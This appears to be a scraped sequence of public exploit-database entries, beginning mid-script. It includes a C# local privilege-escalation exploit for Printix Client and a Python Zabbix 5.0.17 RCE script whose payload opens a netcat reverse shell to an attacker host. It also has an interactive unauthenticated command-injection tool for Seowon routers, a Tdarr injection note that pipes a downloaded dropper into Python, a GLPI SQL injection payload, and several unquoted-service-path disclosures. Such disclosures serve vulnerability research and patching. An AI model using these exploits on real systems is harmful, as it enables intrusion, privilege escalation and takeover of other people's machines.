open("0day_Hejap.txt","wb") as f: print("[+] Creating %s Shellcode 0day-Hejap payload.." %len(payload)) f.write(payload) f.close() print("[+] File created!") except: print("[-]File cannot be created")

# Exploit Title: Printix Client 1.3.1106.0 - Privilege Escalation # Date: 3/2/2022 # Exploit Author: Logan Latvala # Vendor Homepage: https://printix.net # Software Link: https://software.printix.net/client/win/1.3.1106.0/PrintixClientWindows.zip # Version: <= 1.3.1106.0 # Tested on: Windows 7, Windows 8, Windows 10, Windows 11 # CVE : CVE-2022-25090 # Github for project: https://github.com/ComparedArray/printix-CVE-2022-25090 using System; using System.Runtime.InteropServices; using System.Drawing; using System.Reflection; using System.Threading; using System.IO; using System.Text; using System.Resources; using System.Diagnostics; //Assembly COM for transparent creation of the application. //End of Assembly COM For Transparent Creation usage. public class Program { //Initiator class for the program, the program starts on the main method. public static void Main(string[] args) { //Console.SetWindowSize(120,30); //Console.SetBufferSize(120,30); Console.ForegroundColor = ConsoleColor.Blue; Console.WriteLine("┌─────────────────────────────────────────────────────────────────────────────────────────────────────────────────────"); Console.WriteLine("├ oo dP dP "); Console.ForegroundColor = ConsoleColor.Red; Console.WriteLine("├ 88 88 "); Console.ForegroundColor = ConsoleColor.Green; Console.WriteLine("├ dP 88d888b. .d8888b. d888888b d8888P .d8888b. 88d8b.d8b. 88d888b. "); Console.ForegroundColor = ConsoleColor.Blue; Console.WriteLine("├ 88 88' `88 88' `88 .d8P' 88 88ooood8 88'`88'`88 88' `88 "); Console.ForegroundColor = ConsoleColor.Yellow; Console.WriteLine("├ 88 88 88 88. .88 .Y8P 88 88. ... 88 88 88 88. .88 "); Console.ForegroundColor = ConsoleColor.Magenta; Console.WriteLine("├ dP dP dP `88888P8 d888888P dP `88888P' dP dP dP 88Y888P' "); Console.WriteLine("├ 88 "); Console.WriteLine("├ dP "); Console.ForegroundColor = ConsoleColor.Blue; Console.Write("├ For "); Console.ForegroundColor = ConsoleColor.Magenta; Console.Write("Printix "); Console.ForegroundColor = ConsoleColor.Blue; Console.Write("Services Designed By Logan Latvala\n"); Console.WriteLine("└─────────────────────────────────────────────────────────────────────────────────────────────────────────────────────"); Thread.Sleep(3000); string filesH = ""; Console.WriteLine("Drag and drop a payload onto this application for execution."); try { if (args[0]?.Length >0) { Console.WriteLine("File Added: " + args[0]); } } catch (Exception e) { Console.WriteLine("You\'re missing a file here, please ensure that you drag and drop a payload to execute.\n \n We'll print the error for you right here...\n \n"); Console.ForegroundColor = ConsoleColor.Red; Console.WriteLine(e); Console.ReadLine(); Environment.Exit(40); } Console.WriteLine("\n We're going to look for your printix installer, one moment..."); string[] installerSearch = Directory.GetFiles(@"C:\windows\installer\", "*.msi", SearchOption.AllDirectories); double mCheck = 1.00; string trueInstaller = ""; //Starts to enumerate window's installer directory for an author with the name of printix. foreach (string path in installerSearch) { Console.WriteLine("Searching Files: {0} / {1} Files", mCheck, installerSearch.Length); Console.WriteLine("Searching Files... " + (Math.Round((mCheck / installerSearch.Length) * 100)) + "% Done."); if (readFileProperties(path, "Printix")) { trueInstaller = path; Console.WriteLine("We've found your installer, we'll finish enumeration."); goto MGMA; } mCheck++; } //Flag for enumeration when the loop needs to exit, since it shouldn't loop infinitely. MGMA: if (trueInstaller == "") { Console.WriteLine("We can't find your installer, you are not vulnerable."); Thread.Sleep(2000); Environment.Exit(12); } Console.WriteLine("├─────────────────────────────────────────────────────────────────────────────────────────────────────────────────────"); Console.WriteLine("├ We are starting to enumerate your temporary directory."); Console.WriteLine("├─────────────────────────────────────────────────────────────────────────────────────────────────────────────────────"); //Start a new thread here for enumeration. Thread t = new Thread(() => newTempThread(filesH, args)); t.Start(); Process.Start(trueInstaller); Console.WriteLine("All done."); Console.ReadLine(); } public static void newTempThread(string filesH, string[] args) { while (true) { try { //Starts the inheriting process for printix, in which scans for the files and relays their contents. string[] files = Directory.GetFiles(@"C:\Users\" + Environment.UserName + @"\AppData\Local\Temp\", "msiwrapper.ini", SearchOption.AllDirectories); if (!string.IsNullOrEmpty(files[0])) { foreach (string fl in files) { if (!filesH.Contains(fl)) { //filesH += " " + fl; string[] fileText = File.ReadAllLines(fl); int linerc = 0; foreach (string liners in fileText) { if (liners.Contains("SetupFileName")) { //Most likely the temporary directory for setup, which presents it properly. Console.WriteLine("├─────────────────────────────────────────────────────────────────────────────────────────────────────────────────────"); Console.WriteLine("├ " + fl); fileText[linerc] = @"SetupFileName=" + "\"" + args[0] + "\""; Console.WriteLine("├ " + fileText[linerc] + ""); Console.WriteLine("├─────────────────────────────────────────────────────────────────────────────────────────────────────────────────────"); Console.WriteLine("│"); filesH += " " + fl; File.WriteAllText(fl, string.Empty); File.WriteAllLines(fl, fileText); } linerc++; } } } } } catch (Exception e) { Console.WriteLine("There was an error, try re-running the program. \n" + e); Console.ReadLine(); } Thread.Sleep(20); } } public static bool readFileProperties(string file, string filter) { System.Diagnostics.Process process = new System.Diagnostics.Process(); System.Diagnostics.ProcessStartInfo startInfo = new System.Diagnostics.ProcessStartInfo(); startInfo.UseShellExecute = false; startInfo.RedirectStandardOutput = true; startInfo.FileName = "CMD.exe"; startInfo.Arguments = "/c PowerShell -Command \"$FilePath='" + file + "'; Write-Host ((New-Object -COMObject Shell.Application).NameSpace((Split-Path -Parent -Path $FilePath))).ParseName((Split-Path -Leaf -Path $FilePath)).ExtendedProperty('System.Author')\""; process.StartInfo = startInfo; process.Start(); string output = process.StandardOutput.ReadToEnd(); process.WaitForExit(); if (output.Contains(filter)) { return true; } else { return false; } //wmic datafile where Name="F:\\ekojs.txt" get Description,Path,Status,Version } }

# Exploit Title: Wondershare Dr.Fone 12.0.18 - 'Wondershare InstallAssist' Unquoted Service Path # Discovery by: Mohamed Alzhrani # Discovery Date: 2022-03-08 # Vendor Homepage: https://www.wondershare.com/ # Software Link : https://download.wondershare.com/drfone_full3360.exe # Tested Version: 12.0.18 # Vulnerability Type: Unquoted Service Path # Tested on OS: Windows 10 Pro x64 es # Step to discover Unquoted Service Path: C:\Users\0xMaz>cmd /c wmic service get name,displayname,pathname,startmode |findstr /i "auto" |findstr /i /v "c:\windows\\" |findstr /i /v """ Wondershare Install Assist Service Wondershare InstallAssist C:\ProgramData\Wondershare\Service\InstallAssistService.exe Auto # Service info: C:\Users\0xMaz>sc qc "Wondershare InstallAssist" [SC] QueryServiceConfig SUCCESS SERVICE_NAME: Wondershare InstallAssist TYPE : 10 WIN32_OWN_PROCESS START_TYPE : 2 AUTO_START ERROR_CONTROL : 1 NORMAL BINARY_PATH_NAME : C:\ProgramData\Wondershare\Service\InstallAssistService.exe LOAD_ORDER_GROUP : TAG : 0 DISPLAY_NAME : Wondershare Install Assist Service DEPENDENCIES : SERVICE_START_NAME : LocalSystem #Exploit: The local user able to insert their code in the system root path undetected by the OS or other security applications where it could potentially be executed during application startup or reboot. If successful, the local user's code would execute with the elevated privileges of the application.

# Exploit Title: McAfee® Safe Connect VPN - Unquoted Service Path Elevation Of Privilege # Date: 09/03/2022 # Exploit Author: Saud Alenazi # Vendor Homepage: https://www.mcafee.com/ # Software Link: https://www.mcafee.com/en-us/vpn/mcafee-safe-connect.html # Version: 2.13 # Tested: Windows 10 x64 # Contact: https://twitter.com/dmaral3noz C:\Users\saudh>sc qc SafeConnectService [SC] QueryServiceConfig SUCCESS SERVICE_NAME: SafeConnectService TYPE : 10 WIN32_OWN_PROCESS START_TYPE : 2 AUTO_START ERROR_CONTROL : 1 NORMAL BINARY_PATH_NAME : C:\Program Files (x86)\McAfee\McAfee Safe Connect\SafeConnect.ServiceHost.exe LOAD_ORDER_GROUP : TAG : 0 DISPLAY_NAME : McAfee Safe Connect Service DEPENDENCIES : SERVICE_START_NAME : LocalSystem #Exploit: A successful attempt would require the local user to be able to insert their code in the system root path undetected by the OS or other security applications where it could potentially be executed during application startup or reboot. If successful, the local user's code would execute with the elevated privileges of the application.

# Exploit Title: BattlEye 0.9 - 'BEService' Unquoted Service Path # Date: 09/03/2022 # Exploit Author: Saud Alenazi # Vendor Homepage: https://www.battleye.com/ # Software Link: https://www.battleye.com/downloads/ # Version: 0.94 # Tested: Windows 10 Pro # Contact: https://twitter.com/dmaral3noz C:\Users\saudh>sc qc BEService [SC] QueryServiceConfig SUCCESS SERVICE_NAME: BEService TYPE : 10 WIN32_OWN_PROCESS START_TYPE : 3 DEMAND_START ERROR_CONTROL : 1 NORMAL BINARY_PATH_NAME : C:\Program Files (x86)\Common Files\BattlEye\BEService.exe LOAD_ORDER_GROUP : TAG : 0 DISPLAY_NAME : BattlEye Service DEPENDENCIES : SERVICE_START_NAME : LocalSystem #Exploit: A successful attempt would require the local user to be able to insert their code in the system root path undetected by the OS or other security applications where it could potentially be executed during application startup or reboot. If successful, the local user's code would execute with the elevated privileges of the application.

# Exploit Title: Zabbix 5.0.17 - Remote Code Execution (RCE) (Authenticated) # Date: 9/3/2022 # Exploit Author: Hussien Misbah # Vendor Homepage: https://www.zabbix.com/ # Software Link: https://www.zabbix.com/rn/rn5.0.17 # Version: 5.0.17 # Tested on: Linux # Reference: https://github.com/HussienMisbah/tools/tree/master/Zabbix_exploit #!/usr/bin/python3 # note : this is blind RCE so don't expect to see results on the site # this exploit is tested against Zabbix 5.0.17 only import sys import requests import re import random import string import colorama from colorama import Fore print(Fore.YELLOW+"[*] this exploit is tested against Zabbix 5.0.17 only") print(Fore.YELLOW+"[*] can reach the author @ https://hussienmisbah.github.io/") def item_name() : letters = string.ascii_letters item = ''.join(random.choice(letters) for i in range(20)) return item if len(sys.argv) != 6 : print(Fore.RED +"[!] usage : ./expoit.py <target url> <username> <password> <attacker ip> <attacker port>") sys.exit(-1) url = sys.argv[1] username =sys.argv[2] password = sys.argv[3] host = sys.argv[4] port = sys.argv[5] s = requests.Session() headers ={ "User-Agent": "Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0", } data = { "request":"hosts.php", "name" : username , "password" : password , "autologin" :"1" , "enter":"Sign+in" } proxies = { 'http': 'http://127.0.0.1:8080' } r = s.post(url+"/index.php",data=data) #proxies=proxies) if "Sign out" not in r.text : print(Fore.RED +"[!] Authentication failed") sys.exit(-1) if "Zabbix 5.0.17" not in r.text : print(Fore.RED +"[!] This is not Zabbix 5.0.17") sys.exit(-1) if "filter_hostids%5B0%5D=" in r.text : try : x = re.search('filter_hostids%5B0%5D=(.*?)"', r.text) hostId = x.group(1) except : print(Fore.RED +"[!] Exploit failed to resolve HostID") print(Fore.BLUE +"[?] you can find it under /items then add item") sys.exit(-1) else : print(Fore.RED +"[!] Exploit failed to resolve HostID") print(Fore.BLUE +"[?] you can find HostID under /items then add item") sys.exit(-1) sid= re.search('<meta name="csrf-token" content="(.*)"/>',r.text).group(1) # hidden_csrf_token command=f"rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|sh -i 2>&1|nc {host} {port} >/tmp/f" payload = f"system.run[{command},nowait]" Random_name = item_name() data2 ={ "sid":sid,"form_refresh":"1","form":"create","hostid":hostId,"selectedInterfaceId":"0","name":Random_name,"type":"0","key":payload,"url":"","query_fields[name][1]":"","query_fields[value][1]":"","timeout":"3s","post_type":"0","posts":"","headers[name][1]":"","headers[value][1]":"","status_codes":"200","follow_redirects":"1","retrieve_mode":"0","http_proxy":"","http_username":"","http_password":"","ssl_cert_file":"","ssl_key_file":"","ssl_key_password":"","interfaceid":"1","params_es":"","params_ap":"","params_f":"","value_type":"3","units":"","delay":"1m","delay_flex[0][type]":"0","delay_flex[0][delay]":"","delay_flex[0][schedule]":"","delay_flex[0][period]":"","history_mode":"1","history":"90d","trends_mode":"1","trends":"365d","valuemapid":"0","new_application":"","applications[]":"0","inventory_link":"0","description":"","status":"0","add":"Add" } r2 =s.post(url+"/items.php" ,data=data2,headers=headers,cookies={"tab":"0"} ) no_pages= r2.text.count("?page=") #################################################[Searching in all pages for the uploaded item]################################################# page = 1 flag=False while page <= no_pages : r_page=s.get(url+f"/items.php?page={page}" ,headers=headers ) if Random_name in r_page.text : print(Fore.GREEN+"[+] the payload has been Uploaded Successfully") x2 = re.search(rf"(\d+)[^\d]>{Random_name}",r_page.text) try : itemId=x2.group(1) except : pass print(Fore.GREEN+f"[+] you should find it at {url}/items.php?form=update&hostid={hostId}&itemid={itemId}") flag=True break else : page +=1 if flag==False : print(Fore.BLUE +"[?] do you know you can't upload same key twice ?") print(Fore.BLUE +"[?] maybe it is already uploaded so set the listener and wait 1m") print(Fore.BLUE +"[*] change the port and try again") sys.exit(-1) #################################################[Executing the item]################################################# data2["form"] ="update" data2["selectedInterfaceId"] = "1" data2["check_now"]="Execute+now" data2.pop("add",None) data2["itemid"]=itemId, print(Fore.GREEN+f"[+] set the listener at {port} please...") r2 =s.post(url+"/items.php" ,data=data2,headers=headers,cookies={"tab":"0"}) # ,proxies=proxies ) print(Fore.BLUE+ "[?] note : it takes up to +1 min so be patient :)") answer =input(Fore.BLUE+"[+] got a shell ? [y]es/[N]o: ") if "y" in answer.lower() : print(Fore.GREEN+"Nice !") else : print(Fore.RED+"[!] if you find out why please contact me ") sys.exit(0)

# Exploit Title: Sony playmemories home - 'PMBDeviceInfoProvider' Unquoted Service Path # Date: 09/03/2022 # Exploit Author: Saud Alenazi # Vendor Homepage: https://www.sony.com/ # Software Link: https://support.d-imaging.sony.co.jp/www/disoft/int/download/playmemories-home/win/en/index.html # Version: 6.0 # Tested: Windows 10 Pro # Contact: https://twitter.com/dmaral3noz C:\Users\saudh>sc qc PMBDeviceInfoProvider [SC] QueryServiceConfig SUCCESS SERVICE_NAME: PMBDeviceInfoProvider TYPE : 10 WIN32_OWN_PROCESS START_TYPE : 2 AUTO_START ERROR_CONTROL : 1 NORMAL BINARY_PATH_NAME : C:\Program Files (x86)\Sony\PlayMemories Home\PMBDeviceInfoProvider.exe LOAD_ORDER_GROUP : TAG : 0 DISPLAY_NAME : PMBDeviceInfoProvider DEPENDENCIES : RPCSS SERVICE_START_NAME : LocalSystem #Exploit: A successful attempt would require the local user to be able to insert their code in the system root path undetected by the OS or other security applications where it could potentially be executed during application startup or reboot. If successful, the local user's code would execute with the elevated privileges of the application.

# Exploit Title: WOW21 5.0.1.9 - 'Service WOW21_Service' Unquoted Service Path # Exploit Author: Antonio Cuomo (arkantolo) # Exploit Date: 2022-03-09 # Vendor : ilwebmaster21 # Version : WOW21_Service 5.0.1.9 # Vendor Homepage : https://wow21.life/ # Tested on OS: Windows 10 Pro x64 #PoC : ============== C:\>sc qc WOW21_Service [SC] QueryServiceConfig OPERAZIONI RIUSCITE NOME_SERVIZIO: WOW21_Service TIPO : 10 WIN32_OWN_PROCESS TIPO_AVVIO : 2 AUTO_START CONTROLLO_ERRORE : 1 NORMAL NOME_PERCORSO_BINARIO : C:\Program Files\WOW21\WOW21_Service.exe GRUPPO_ORDINE_CARICAMENTO : TAG : 0 NOME_VISUALIZZATO : WOW21_Service DIPENDENZE : SERVICE_START_NAME : LocalSystem

# Exploit Title: Sandboxie-Plus 5.50.2 - 'Service SbieSvc' Unquoted Service Path # Exploit Author: Antonio Cuomo (arkantolo) # Exploit Date: 2022-03-09 # Vendor : David Xanatos # Version : SbieSvc 5.50.2 # Vendor Homepage : https://sandboxie-plus.com/ # Tested on OS: Windows 10 Pro x64 #PoC : ============== C:\>sc qc SbieSvc [SC] QueryServiceConfig OPERAZIONI RIUSCITE NOME_SERVIZIO: SbieSvc TIPO : 10 WIN32_OWN_PROCESS TIPO_AVVIO : 2 AUTO_START CONTROLLO_ERRORE : 1 NORMAL NOME_PERCORSO_BINARIO : C:\Program Files\Sandboxie-Plus\SbieSvc.exe GRUPPO_ORDINE_CARICAMENTO : UIGroup TAG : 0 NOME_VISUALIZZATO : Sandboxie Service DIPENDENZE : SERVICE_START_NAME : LocalSystem

# Exploit Title: Seowon SLR-120 Router - Remote Code Execution (Unauthenticated) # Date: 2022-03-11 # Exploit Author: Aryan Chehreghani # Vendor Homepage: http://www.seowonintech.co.kr # Software Link: http://www.seowonintech.co.kr/en/product/detail.asp?num=126&big_kind=B05&middle_kind=B05_30 # Version: All version # Tested on: Windows 10 Enterprise x64 , Linux # CVE : CVE-2020-17456 # [ About - Seowon SLR-120 router ]: #The SLR-120 series are provide consistent access to LTE networks and transforms it to your own hotspot while being mobile, #The convenience of sharing wireless internet access invigorates your lifestyle, families, #friends and workmates. Carry it around to boost your active communication anywhere. # [ Description ]: #Execute commands without authentication as admin user , #To use it in all versions, we only enter the router ip & Port(if available) in the script and Execute commands with root user. # [ Vulnerable products ]: #SLR-120S42G #SLR-120D42G #SLR-120T42G import requests print (''' ########################################################### # Seowon SLR-120S42G router - RCE (Unauthenticated) # # BY:Aryan Chehreghani # # Team:TAPESH DIGITAL SECURITY TEAM IRAN # # mail:[email protected] # # -+-USE:python script.py # # Example Target : http://192.168.1.1:443/ # ########################################################### ''') url = input ("=> Enter Target : ") while(True): try: cmd = input ("~Enter Command $ ") header = { "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:98.0) Gecko/20100101 Firefox/98.0", "Accept": "*/*", "Accept-Language": "en-US,en;q:0.5", "Accept-Encoding": "gzip, deflate", "Content-Type": "application/x-www-form-urlencoded", "Content-Length": "207", "Origin": "http://192.168.1.1", "Connection": "close", "Referer": "http://192.168.1.1/", "Upgrade-Insecure-Requests": "1" } datas = { 'Command':'Diagnostic', 'traceMode':'ping', 'reportIpOnly':'', 'pingIpAddr':';'+cmd, 'pingPktSize':'56', 'pingTimeout':'30', 'pingCount':'4', 'maxTTLCnt':'30', 'queriesCnt':'3', 'reportIpOnlyCheckbox':'on', 'logarea':'com.cgi', 'btnApply':'Apply', 'T':'1646950471018' } x = requests.post(url+'/cgi-bin/system_log.cgi?',data=datas) print(x.text) except: break

# Exploit Title: Tdarr 2.00.15 - Command Injection # Date: 10/03/2022 # Exploit Author: Sam Smith # Vendor Homepage: https://tdarr.io # Software Link: https://f000.backblazeb2.com/file/tdarrs/versions/2.00.15/linux_arm64/Tdarr_Server.zip # Version: 2.00.15 (likely also older versions) # Tested on: 2.00.15 Exploit: The Help tab contains a terminal for both FFmpeg and HandBrake. These terminals do not include input filtering which allows the user to chain commands and spawn a reverse shell. eg. `--help; curl http://192.168.0.2/dropper.py | python` or `--help;whoami;cat /etc/passwd`. Tdarr is not protected by any auth by default and no credentials are required to trigger RCE

# Exploit Title: Baixar GLPI Project 9.4.6 - SQLi # Date: 10/12 # Exploit Author: Joas Antonio # Vendor Homepage: https://glpi-project.org/pt-br/ <https://www.blueonyx.it/ # Software Link: https://glpi-project.org/pt-br/baixar/ # Version: GLPI - 9.4.6 # Tested on: Windows/Linux # CVE : CVE-2021-44617 #POC1: plugins/ramo/ramoapirest.php/getOutdated?idu=-1%20OR%203*2*1=6%20AND%20000111=000111 sqlmap -u "url/plugins/ramo/ramoapirest.php/getOutdated?idu=-1"

# Exploit Title: VIVE Runtime Service - 'ViveAgentService' Unquoted Service Path # Date: 11/03/2022 # Exploit Author: Faisal Alasmari # Vendor Homepage: https://www.vive.com/ # Software Link: https://developer.vive.com/resources/downloads/ # Version: 1.0.0.4 # Tested: Windows 10 x64 C:\Users\User>sc qc "VIVE Runtime Service" [SC] QueryServiceConfig SUCCESS SERVICE_NAME: VIVE Runtime Service TYPE : 10 WIN32_OWN_PROCESS START_TYPE : 2 AUTO_START ERROR_CONTROL : 1 NORMAL BINARY_PATH_NAME : C:\Program Files (x86)\VIVE\Updater\App\ViveRuntimeService\ViveAgentService.exe LOAD_ORDER_GROUP : TAG : 0 DISPLAY_NAME : VIVE Runtime Service DEPENDENCIES : SERVICE_START_NAME : LocalSystem #Exploit: A successful attempt would require the local user to be able to insert their code in the system root path undetected by the OS or other security applications where it could potentially be executed during application startup or reboot. If successful, the local user's code would execute with the elevated privileges of the application.